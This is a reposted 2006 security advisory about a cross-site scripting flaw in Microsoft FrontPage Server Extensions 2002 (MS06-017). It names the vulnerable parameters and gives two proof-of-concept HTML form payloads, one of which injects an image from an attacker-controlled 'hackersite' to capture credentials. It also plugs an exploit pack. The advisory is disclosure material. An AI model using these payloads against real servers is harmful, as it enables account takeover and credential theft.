Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12193
HistoryApr 13, 2006 - 12:00 a.m.

Vulnerability in Microsoft FrontPage Server Extensions Could Allow Cross-Site Scripting

2006-04-1300:00:00
vulners.com
8
JSON

Argeniss Security Advisory

Name: Vulnerability in Microsoft FrontPage Server Extensions Could Allow
Cross-Site Scripting (MS06-17)
Affected Software: Microsoft FrontPage Server Extensions 2002 and Microsoft
SharePoint Team Services
Severity: Medium
Remote exploitable: Yes (User intervention required)
Credits: Esteban Martнnez Fayу
Date: 4/11/2006
Advisory Number: ARG040602

Details:
The FrontPage Server Extensions 2002 (included in Windows Sever 2003 IIS 6.0
and available as a separate download for Windows 2000 and XP) has a web page
/_vti_bin/_vti_adm/fpadmdll.dll that is used for administrative purposes.
This web page is vulnerable to cross site scripting attacks allowing an
attacker to run client-side script on behalf of an FPSE user. If the victim
is an administrator, the attacker could take complete control of a Front
Page Server Extensions 2002 server.

To exploit the vulnerability an attacker can send a specially crafted e-mail
message to a FPSE user and then persuade the user to click a link in the
e-mail message.
In addition, this vulnerability can be exploited if an attacker hosts a
malicious website and persuade the user to visit it.

The vulnerable parameters of fpadmdll.dll are "operation", "command", and
"name". These parameters appears in the output without properly sanitization
in an HTML comment but it can be escaped with a '–>'.

Exploit Examples:

An attacker could create a FORM that POST to the FPSE server and executes a
script on the client system.
<form action=http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll method="POST">
<input type="hidden" name="operation" value="–><script>alert()</script>">
<input type="hidden" name="action" value="none">
<input type="hidden" name="port" value="/LM/W3SVC/1:">
<input type="submit" name="page" value="healthrp.htm">
</form>

Also, an attacker could inject an image from another web site that he has
control over and if it has HTTP authentication could convince the user to
enter its credentials and capture it.
<form action=http://iisserver/_vti_bin/_vti_adm/fpadmdll.dll method="POST">
<input type="hidden" name="operation" value="–><img
src=http://hackersite/image.jpg&gt;&quot;&gt;
<input type="hidden" name="action" value="none">
<input type="hidden" name="port" value="/LM/W3SVC/1:">
<input type="submit" name="page" value="healthrp.htm">
</form>

Vendor Status:
Vendor was contacted and a patch was released.

Patch Available:
Apply patch MS06-017.

Links:
http://www.argeniss.com/research/ARGENISS-ADV-040602.txt
http://www.microsoft.com/technet/security/Bulletin/MS06-017.mspx

Spam:
Argeniss Ultimate 0day Exploits Pack
http://www.argeniss.com/products.html

Argeniss - Information Security
Application Security Experts
http://www.argeniss.com

Correo Yahoo!
Espacio para todos tus mensajes, antivirus y antispam Ўgratis!
ЎAbrн tu cuenta ya! - http://correo.yahoo.com.ar

JSON